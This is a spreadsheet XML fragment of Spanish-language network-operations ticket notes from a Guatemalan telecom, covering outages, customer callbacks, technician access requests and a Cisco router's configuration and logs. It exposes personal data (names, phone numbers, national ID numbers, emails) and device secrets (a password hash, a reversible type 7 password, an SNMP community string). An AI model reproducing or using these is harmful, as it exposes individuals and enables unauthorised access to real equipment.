EN SEGUIMIENTO AL SERVICIO REPORTADO ID: 361700115T || GRUPO DE TIENDAS ASOCIADOS, SOCIEDAD ANONIMA || AVENIDA AMERICA Y CALLE DE LA ESSO , BARRIO SAN MIGUEL , MUNICIPIO PUERTO DE SAN JOSE. LE COMENTO SE ESTÁ COORDINANDO UNA VISITA TÉCNICA PARA EL DÍA DE MAÑANA MARTES 14/06 A PARTIR DE LAS 7:00 HRS POR LO QUE SOLICITAMOS NOS POYEN EN GESTIONAR ACCESOS PARA EL PERSONAL TÉCNICO ASIGNADO.
ADJUNTO LOS DATOS DEL PERSONAL TÉCNICO ASIGNADO.
MILTON DAVID MORATAYA GONZALEZ IBM: 650123 DPI: 2277-08458-0501
AXEL DANILO ZARPEC SAZO                 IBM: 796395   DPI:1624-52527-0501
QUEDAMOS ATENTOS A SU CONFIRMACIÓN PARA PROCEDER.</t>
  </si>
  <si>
    <t>F4600293</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE IVAN ARREDONDO 45107718 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001067801</t>
  </si>
  <si>
    <t>SE VALIDARA CON CLIENTE EQUIPO FORTINET NO SE HA REINICIADO DESDE HACE MAS DE 4 HORAS-</t>
  </si>
  <si>
    <t>F4600306</t>
  </si>
  <si>
    <t>*** SE ENVÍAN DATOS DE PERSONAL TÉCNICO A CLIENTE, A LA ESPERA DE CONFIRMACIÓN DE ACCESOS ***
DE: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
ENVIADO: MARTES, 14 DE JUNIO DE 2022 9:42
PARA: GORELLANA@MAYCOM.COM.GT &lt;GORELLANA@MAYCOM.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: MAYOREO DE COMPUTACION S.A. -- 331800153T -- COMERCIAL GALERIAS CATALINA
ESTIMADOS BUEN DÍA,
EN SEGUIMIENTO DEL CASO, SE HA GENERADO UNA VISITA TÉCNICA, POR LO QUE SE REQUIERE DE SU APOYO EN LA GESTIÓN Y AUTORIZACIÓN DE ACCESOS PARA EL PERSONAL QUE SE DESCRIBE A CONTINUACIÓN:
DANIEL ENRIQUE MONTENEGRO CARACUN   2414 54425 0101
EDGAR DANIEL GOMEZ MENDEZ                      1628 97243 1401
CUALQUIER DUDA O COMENTARIO QUEDO A LA ORDEN,
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDWIN BLANCO 24210880 EXT 135 MENCIONA QUE NO SE ENCUENTRA EN PR POR LO QUE BRINDA CONTACTO EDUARDO MONZON - 37625185
MENCIONA QUE DE LA CENTRAL A PR NO TIENEN CONEXION
-ID 3001035882</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDWIN BLANCO 24210880 EXT 135 INDICA QUE LOS ACCESOS YA ESTAN DISPONIBLES QUE SE PUEDEN PRESENTAR LOS TECNICOS**
ID 3001051297
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDUARDO MONZON - 37625185 MENCIONA QUE PERSONAL TECNICO YA ESTA TRABAJANDO EN PR
-ID 3001074761</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDUARDO MONZON - 37625185 SE DEJA EN CONFERENCIA CON GESTOR
-ID3001037401</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDWIN BLANCO AL 24210880 EXT 135 INDICA QUE AUN VE CAIDO EL SERVICIO || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
-ID 3001025321
**</t>
  </si>
  <si>
    <t>F4600310</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 525551745290 CARLOS MENCIONA QUE RETROALIMENTARAN A CLIENTE, Y SI PRESENTAN ALGUN PROBLEMA LO ESTARA REPORTANDO
-ID 3001172904</t>
  </si>
  <si>
    <t>SE LLAMA A CIENTE 52 55 5174 5290 RESPONDE ILIANA RAMOS DEJA EN ESPERA Y YA NO RETOMA LA LLAMADA
-ID 3001068653</t>
  </si>
  <si>
    <t>F4600352</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JESSICA RAMOS 59678406 MENCIONA QUE NO CUENTA CON ENERGIA EN PR
-ID 3001120047</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  BRYAN 46492855 PERO NO RESPONDE
-ID 3001094776</t>
  </si>
  <si>
    <t>SE LLAMA  A CLIENTE BRYAN 46492855 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001076527</t>
  </si>
  <si>
    <t>*SE LLAMA A CLIENTE LYNDA MAYTE WUG CASTAÑEDA AL 54896646 NO RESPONDE || ENVIA A BUZON ||
SE INTENTARA LUEGO **
-ID 3001039320
**</t>
  </si>
  <si>
    <t>F4600376</t>
  </si>
  <si>
    <t>SE CONSULTA A GRUPO BANCO AZTECA PROACTIVO DE SKYPE SI TIENEN INFORMACIÓN DEL ENLACE.</t>
  </si>
  <si>
    <t>F4600416</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANGEL CHANG AL 47602619 NO RESPONDE || SE INTENTARA LUEGO **
-ID 3001116227
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 36576394 CONTESTA EL  SEÑOR NELSON GUZMAN AL 41288136 INFORMA QUE NO HAN ABIERTO LA TIENDA SOLICITA QUE SE LE LLAME DE 9:00 EN ADELANTE **
-ID 3001032633
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 36576394 CONTESTA EL SEÑOR EDWIN INDICA QUE NO SE ENCUENTRA EN TIENDA SOLICITA QUE SE LE LLAME AL SEÑOR NELSON GUZMAN AL 41288136 **
-ID 3001031840
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PARA REALIZAR PRUEBAS DE PRIMER NIVEL SIN EMBARGO NO RESPONDE--</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  NELSON GUZMAN 41288136 MENCIONA QUE NO HAN PRESENTADO PROBLEMA DE ENERGIA Y YA APLICARON REINICIO A LOS EQUIPOS
CLIENTE SOLICITA VISITA TECNICA
-ID 3001077665
NOMBRE DEL CLIENTE: INDUSTRIA COMERCIALIZADORA DE ELECTRODOMESTICOS, SOCIEDAD ANONIMA
UBICACIÓN:5 AVENIDA 5-49 ZONA 1 AUN COSTADO DE IGLESIA CATOLICA (ALMANECES JAPON) FRENTE AL PARQUE DE RETALHULEU
CONTACTO EN SITIO: NELSON GUZMAN 41288136
HORARIO DE ATENCION:9:00 - 19:00 HRS
GESTIÓN DE PERMISOS: UNICAMENTE IDENTIFICADOS</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL PR AL 36576394 CONTESTA EL SEÑOR  EDWIN MUÑOZ INDICA QUE EL SEÑOR ANGEL YA HABIA SOLICITADO VISITA || SE NOTIFICA A GESTOR **
-ID 3001114163
**</t>
  </si>
  <si>
    <t>F4600427</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE KENRY GOMEZ AL 33402404 INDICA QUE POR EL MOMENTO ESTA ESTABLE PERO SOLICITA VIA CORREO QUE SE LE  DETALLE SI SE VIO ALGUNA INTERMITENTE DE UNA VLAN Y NECESITA LA INFORMACION DE LAS 19:00 A 21:00 HRS || SE NOTIFICA A GESTOR **
-ID 3001012147
**
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE HERNAN PEREZ AL 31804584 NO RESPONDE || SE INTENTARA LUEGO **
-ID 3001012093
**</t>
  </si>
  <si>
    <t>F4600468</t>
  </si>
  <si>
    <t>NO SE TIENE GESTION DEL CPE DEL CLIENTE  SE PROCEDE A DEJAR EN MONITOREO PARA VALIDAR A FINAL DE TURNO LA OPERATIVIDAD DEL ENALCE POSIBLE FALLA DE ENERGIA COMERCIAL.
&lt;GNCYGTG2N2D4A05A15EIM10&gt;TELNET  VP TRANSFERENCIAS 10.218.48.179
TRYING 10.218.48.179 ...
PRESS CTRL+K TO ABORT
CONNECTED TO 10.218.48.179 ...
INFO: THE CONNECTION WAS CLOSED BY THE REMOTE HOST.
&lt;GNCYGTG2N2D4A05A15EIM10&gt;</t>
  </si>
  <si>
    <t>F4600495</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE SOLICITANDO LOS ACCESOS PARA LOS TECNICOS ESTAMOS A LA ESPERA DE SU RESPUESTA
DE: JOSE ARTURO CORADO JIMENEZ
ENVIADO: MARTES, 14 DE JUNIO DE 2022 9:10
PARA: STEVEN MARQUEZ (VENDOR) &lt;STEVEN.MARQUEZ@WALMART.COM&gt;; CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;
CC: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: GESTION DE PERMISOS || OPERADORA DE TIENDAS S.A. || 344400019T || DF PALENCIA CALLE REAL Y 3 AVENIDA ESQUINA CANTON AGUA TIBIA PALENCIA
ESTIMADO CLIENTE POR ESTE MEDIO SOLCITO SU APOYO, PARA LA GESTIÓN DE PERMISOS NECESARIOS PARA PERSONAL TÉCNICO CON RESPECTO AL SERVICIO REPORTADO CON EL ID: 344400019T ,  UBICADO EN DF PALENCIA CALLE REAL Y 3 AVENIDA ESQUINA CANTON AGUA TIBIA PALENCIA, ADJUNTO DATOS DEL PERSONAL TÉCNICO,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S COMENTARIOS
¡SALUDOS CORDIALES!</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE STEVEN MARQUEZ AL 2243-7253 NO RESPONDE || SE INTENTARA LUEGO **
-ID 3001013283
**</t>
  </si>
  <si>
    <t>***--- SE RETROALIMENTA A CL --**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: MARTES, 14 DE JUNIO DE 2022 03:28
PARA: GERALD TORRES (VENDOR) &lt;GERALD.TORRES@WALMART.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; STEVEN MARQUEZ (VENDOR) &lt;STEVEN.MARQUEZ@WALMART.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACE CAÍDO DE DF PALENCIA ID: 344400019
BUENOS DÍAS ESTIMADO SR. TORRES.
                LAMENTAMOS LOS INCONVENIENTES, ACTUALMENTE EL SERVICIO SE ENCUENTRA ASOCIADO A UNA FALLA GENERAL POR CORTE DE FIBRA ÓPTICA.
NUESTROS TÉCNICOS DE CAMPO ESTÁN REALIZANDO LA REPARACIONES Y ESPERAMOS CONTAR CON MÁS AVANCES A LA BREVEDAD POSIBLE.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.</t>
  </si>
  <si>
    <t>SE VALIDA QUE EL SERVICIO NO LEVANTA POST REPARACION DE FO DE FALLA MASIVA SE PORCEDE A DESVINCULAR Y A COLOCAR EN ETAPA PENDIENTE CLIENTE YA QUE ES NECESARIO REALIZAR PRUEBAS DE 1ER NIVEL EN EL PUNTO REMOTO</t>
  </si>
  <si>
    <t>F4600501</t>
  </si>
  <si>
    <t xml:space="preserve">ESTIMADO CLIENTE SE VALIDA QUE LA CAIDA QUE TUVO EL FUE EN SUS EQUIPOS DE LA RED INTERNA QUE SE OBSERVA EN EL ROUTER CPE QUE ESE EENCUENTRA EN LAS INSTALACIONES DE USTED.
*JUN 14 04:02:42.860 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO DOWN
*JUN 14 04:02:43.860 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO DOWN
*JUN 14 04:05:50.791 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO UP
*JUN 14 04:05:51.792 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO UP
*JUN 14 04:31:09.904 UTC: %SEC_LOGIN-5-LOGIN_SUCCESS: LOGIN SUCCESS [USER: GESTIONIP] [SOURCE: 10.105.66.33] [LOCALPORT: 23] AT 04:31:09 UTC TUE JUN 14 2022
CC_PANI_FRESH_GT_INTERNET_Z14#
SHOW CLOCK
*04:31:33.028 UTC TUE JUN 14 2022
CC_PANI_FRESH_GT_INTERNET_Z14#
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
GI0/0/0                        UP             UP       WAN PRINCIPAL/_/895700002T/_/
GI0/0/1                        ADMIN DOWN     DOWN
GI0/1/0                        UP             UP       LAN DEL CLIENTE
GI0/1/1                        ADMIN DOWN     DOWN     INTERFACE NO SE ENCUENTRA EN USO
GI0/1/2                        ADMIN DOWN     DOWN     INTERFACE NO SE ENCUENTRA EN USO
GI0/1/3                        ADMIN DOWN     DOWN     INTERFACE NO SE ENCUENTRA EN USO
LO5                            UP             UP       MONITOREO DEL CNOC
VL1                            UP             UP       LAN DEL CLIENTE
CC_PANI_FRESH_GT_INTERNET_Z14#
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
ROUTER CPE ACTIVO HACE 5 DÍ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PANI_FRESH_GT_INTERNET_Z14 UPTIME IS 5 DAYS, 14 HOURS, 21 MINUTES
UPTIME FOR THIS CONTROL PROCESSOR IS 5 DAYS, 14 HOURS, 23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NGJ
1 VIRTUAL ETHERNET INTERFACE
6 GIGABIT ETHERNET INTERFACES
32768K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
4194304K BYTES OF PHYSICAL MEMORY.
2863103K BYTES OF FLASH MEMORY AT BOOTFLASH:.
0K BYTES OF WEBUI ODM FILES AT WEBUI:.
CONFIGURATION REGISTER IS 0X2102
CC_PANI_FRESH_GT_INTERNET_Z14#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 8561 BYTES
!
! LAST CONFIGURATION CHANGE AT 14:10:19 UTC WED JUN 8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PANI_FRESH_GT_INTERNET_Z14
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 9 $9$T91BECUNCZQVDE$Q4VU.ASU3S3DM.4OLJGPFDN5UQBXASUFP7HQL067VFS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706486938
 ENROLLMENT SELFSIGNED
 SUBJECT-NAME CN=IOS-SELF-SIGNED-CERTIFICATE-1706486938
 REVOCATION-CHECK NONE
 RSAKEYPAIR TP-SELF-SIGNED-1706486938
!
CRYPTO PKI TRUSTPOINT SLA-TRUSTPOINT
 ENROLLMENT PKCS12
 REVOCATION-CHECK CRL
!
!
CRYPTO PKI CERTIFICATE CHAIN TP-SELF-SIGNED-1706486938
 CERTIFICATE SELF-SIGNED 01
  30820330 30820218 A0030201 02020101 300D0609 2A864886 F70D0101 05050030
  31312F30 2D060355 04031326 494F532D 53656C66 2D536967 6E65642D 43657274
  69666963 6174652D 31373036 34383639 3338301E 170D3231 30393039 32303537
  35335A17 0D333030 31303130 30303030 305A3031 312F302D 06035504 03132649
  4F532D53 656C662D 5369676E 65642D43 65727469 66696361 74652D31 37303634
  38363933 38308201 22300D06 092A8648 86F70D01 01010500 0382010F 00308201
  0A028201 0100ABE6 B3403AB4 CC39E569 4108F41D C2F57E91 07AD39CF A9440D38
  1961E060 B630153F ACABF1D8 1A135346 27511400 8F9F2A31 78B3C87E 682CCE86
  6E75285C F2410C4D 9EA71200 1D15849C A94D421F 65D16A80 6F26964E 18E02833
  D9340E8C 8ACBC4F9 68649394 7648F253 08585B93 FAF193C5 C9B2C6DA 0CB50F96
  99E25672 228B99CA 5D89F18D 6CC207E9 F61D1F3C 1247AC1B DD872844 80496108
  BC3D691A 39B57823 A7173C89 E73745F0 BBD40AFE 382BAAF2 C42B2CD6 CA92E392
  4C0818F6 9E2CA659 E88F248D E92184D6 7A73A115 8E572013 C039D24F D3E556BB
  CB76297B 67DB5A62 0FA7E672 AC31159F 7B0ADA32 9580AF96 A126571D 422D9990
  B5E9B646 33DB0203 010001A3 53305130 0F060355 1D130101 FF040530 030101FF
  301F0603 551D2304 18301680 1496635E 130FA0EF 2C5DB10B 2B411FE8 13031AC1
  B6301D06 03551D0E 04160414 96635E13 0FA0EF2C 5DB10B2B 411FE813 031AC1B6
  300D0609 2A864886 F70D0101 05050003 82010100 7448663A 6893C899 4DCEBA02
  BF8A4F67 10DA60C8 955CE051 7E87B1E2 6B50980A 48BB506F F68C49F4 1379B1DB
  E50EDB3E 086158B0 CCF02A78 A2BFD68F 3C2B0561 6958BD1A C68FE977 CE6FCCC5
  D2587CAC 03017CE4 18E15E20 5ACC7670 5C2F2930 AA91B32C 63D7BED9 39017C94
  863A1AC0 53439CF9 E19B28C3 6E307475 6AB20211 99B0DA9A 98E3FD2A B1289205
  01BD01D0 BDBD73FD 3B78847C 446E6775 310D8267 001A01FB B145D8FA D20584D5
  E815E62D 0BB9A1D3 83918A71 E7383158 FE62BF3C 037AFBF7 FE63094B 65DF5F18
  547E2CA9 7230B1BE 47A76ACE D2AE7F10 ABFB31A9 CA4AC5F5 35EB1D6D 549B8F7E
  838E5DBD 21F3AD14 01333EA3 AAE5ADCB 780AD70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NGJ
!
DIAGNOSTIC BOOTUP LEVEL MINIMAL
!
SPANNING-TREE EXTEND SYSTEM-ID
!
!
USERNAME GESTIONIP PASSWORD 7 1419375C1B54382060
!
REDUNDANCY
 MODE NONE
!
!
VLAN INTERNAL ALLOCATION POLICY ASCENDING
!
!
POLICY-MAP SERVICIOS_40MB
 CLASS CLASS-DEFAULT
  POLICE CIR 40960000 BC 7680000 BE 15360000
   CONFORM-ACTION TRANSMIT
   EXCEED-ACTION DROP
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.195.138 255.255.255.255
!
INTERFACE GIGABITETHERNET0/0/0
 DESCRIPTION WAN PRINCIPAL/_/895700002T/_/
 BANDWIDTH 40960
 IP ADDRESS 10.105.66.60 255.255.255.224
 IP ACCESS-GROUP 10 IN
 LOAD-INTERVAL 30
 NEGOTIATION AUTO
!
INTERFACE GIGABITETHERNET0/0/1
 NO IP ADDRESS
 SHUTDOWN
 NEGOTIATION AUTO
!
INTERFACE GIGABITETHERNET0/1/0
 DESCRIPTION LAN DEL CLIENTE
!
INTERFACE GIGABITETHERNET0/1/1
 DESCRIPTION INTERFACE NO SE ENCUENTRA EN USO
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/1/2
 DESCRIPTION INTERFACE NO SE ENCUENTRA EN USO
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/1/3
 DESCRIPTION INTERFACE NO SE ENCUENTRA EN USO
 SHUTDOWN
!
INTERFACE VLAN1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 190.149.154.129 255.255.255.252
 NO AUTOSTATE
 SERVICE-POLICY INPUT SERVICIOS_40MB
 SERVICE-POLICY OUTPUT SERVICIOS_40MB
!
IP FORWARD-PROTOCOL ND
NO IP HTTP SERVER
IP HTTP AUTHENTICATION LOCAL
IP HTTP SECURE-SERVER
IP ROUTE 0.0.0.0 0.0.0.0 10.105.66.33
!
!
IP ACCESS-LIST STANDARD ACCESO_CLARO
 PERMIT 10.0.0.0 0.255.255.255
!
LOGGING SOURCE-INTERFACE LOOPBACK5
ACCESS-LIST 10 DENY   172.104.140.107
ACCESS-LIST 10 DENY   74.82.47.2
ACCESS-LIST 10 DENY   192.35.168.112
ACCESS-LIST 10 DENY   192.241.203.198
ACCESS-LIST 10 DENY   192.241.214.165
ACCESS-LIST 10 DENY   192.241.207.146
ACCESS-LIST 10 DENY   64.62.197.62
ACCESS-LIST 10 DENY   54.198.10.59
ACCESS-LIST 10 DENY   184.105.247.254
ACCESS-LIST 10 DENY   192.35.168.144
ACCESS-LIST 10 DENY   184.105.247.196
ACCESS-LIST 10 PERMIT ANY
ACCESS-LIST 88 REMARK MONITOREO DE CLARO
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15
!
!
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION INTERNET_10 AVENIDA 19-51 COLONIA LA CAQADA ZONA 14 GUATEMALA GUATEMA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ACCESS-CLASS ACCESO_CLARO IN
 LOGGING SYNCHRONOUS
 LOGIN LOCAL
 TRANSPORT INPUT ALL
LINE VTY 5 15
 ACCESS-CLASS ACCESO_CLARO IN
 LOGIN
 TRANSPORT INPUT ALL
!
!
!
!
!
!
END
CC_PANI_FRESH_GT_INTERNET_Z14#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 87 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 87 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
    TRAP LOGGING: LEVEL INFORMATIONAL, 90 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
        LOOPBACK5
LOG BUFFER (4096 BYTES):
23 2020 UTC
*JUN 10 05:16:07.273 UTC: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 74.82.47.5 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 10 05:20:44.907 UTC: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 74.82.47.5 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 10 11:16:15.861 UTC: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 54.152.141.51 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 10 14:10:12.328 UTC: %SMART_LIC-4-RESERVE_IN_PROGRESS: NONE LICENSE RESERVATION PROCESS MUST BE COMPLETED WITH THE 'LICENSE SMART RESERVATION INSTALL' COMMAND. RESERVATION STARTED ON MAY 15 06:59:23 2020 UTC
*JUN 11 14:10:12.328 UTC: %SMART_LIC-4-RESERVE_IN_PROGRESS: NONE LICENSE RESERVATION PROCESS MUST BE COMPLETED WITH THE 'LICENSE SMART RESERVATION INSTALL' COMMAND. RESERVATION STARTED ON MAY 15 06:59:23 2020 UTC
*JUN 12 02:00:41.788 UTC: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 185.142.236.34 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 12 02:00:55.539 UTC: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 185.142.236.34 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 12 12:24:16.421 UTC: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 65.49.20.66 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 12 12:28:35.626 UTC: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 65.49.20.66 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 12 14:10:12.329 UTC: %SMART_LIC-4-RESERVE_IN_PROGRESS: NONE LICENSE RESERVATION PROCESS MUST BE COMPLETED WITH THE 'LICENSE SMART RESERVATION INSTALL' COMMAND. RESERVATION STARTED ON MAY 15 06:59:23 2020 UTC
*JUN 12 22:50:40.061 UTC: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 54.152.141.51 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 13 14:10:12.329 UTC: %SMART_LIC-4-RESERVE_IN_PROGRESS: NONE LICENSE RESERVATION PROCESS MUST BE COMPLETED WITH THE 'LICENSE SMART RESERVATION INSTALL' COMMAND. RESERVATION STARTED ON MAY 15 06:59:23 2020 UTC
*JUN 13 16:07:26.782 UTC: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 65.49.20.69 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 13 16:11:44.112 UTC: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 65.49.20.69 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 13 23:39:04.567 UTC: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 54.144.70.143 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 13 23:39:19.242 UTC: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 54.144.70.143 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 13 23:39:24.258 UTC: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 54.144.70.143 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 13 23:39:29.361 UTC: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 54.144.70.143 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 13 23:39:34.656 UTC: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 54.144.70.143 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 13 23:39:39.666 UTC: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 54.144.70.143 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 13 23:39:44.703 UTC: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 54.144.70.143 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 13 23:39:49.800 UTC: %WEBSERVER-5-CONNECTION_FAILED: R0/0: NGINX: CONNECTION FAILED FROM HOST 54.144.70.143 - CIPHER MISMATCH/NO SHARED CIPHER
*JUN 14 04:02:42.860 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO DOWN
*JUN 14 04:02:43.860 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO DOWN
*JUN 14 04:05:50.791 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO UP
*JUN 14 04:05:51.792 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO UP
*JUN 14 04:31:09.904 UTC: %SEC_LOGIN-5-LOGIN_SUCCESS: LOGIN SUCCESS [USER: GESTIONIP] [SOURCE: 10.105.66.33] [LOCALPORT: 23] AT 04:31:09 UTC TUE JUN 14 2022
CC_PANI_FRESH_GT_INTERNET_Z14#
SHOW CLOCK
*04:31:33.028 UTC TUE JUN 14 2022
CC_PANI_FRESH_GT_INTERNET_Z14#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.105.66.33            0   B443.2600.D755  ARPA   GIGABITETHERNET0/0/0
INTERNET  10.105.66.38          121   3C41.0E58.0EA5  ARPA   GIGABITETHERNET0/0/0
INTERNET  10.105.66.60            -   7061.7B0F.6780  ARPA   GIGABITETHERNET0/0/0
INTERNET  190.149.154.129         -   7061.7B0F.67F4  ARPA   VLAN1
INTERNET  190.149.154.130         0   D8EC.E55C.EF99  ARPA   VLAN1
CC_PANI_FRESH_GT_INTERNET_Z14#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
GI0/0/0                        UP             UP       WAN PRINCIPAL/_/895700002T/_/
GI0/0/1                        ADMIN DOWN     DOWN
GI0/1/0                        UP             UP       LAN DEL CLIENTE
GI0/1/1                        ADMIN DOWN     DOWN     INTERFACE NO SE ENCUENTRA EN USO
GI0/1/2                        ADMIN DOWN     DOWN     INTERFACE NO SE ENCUENTRA EN USO
GI0/1/3                        ADMIN DOWN     DOWN     INTERFACE NO SE ENCUENTRA EN USO
LO5                            UP             UP       MONITOREO DEL CNOC
VL1                            UP             UP       LAN DEL CLIENTE
CC_PANI_FRESH_GT_INTERNET_Z14#
SHOW IP INT BRIEF
INTERFACE              IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
GIGABITETHERNET0/0/0   10.105.66.60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95.138  YES NVRAM  UP                    UP
VLAN1                  190.149.154.129 YES NVRAM  UP                    UP
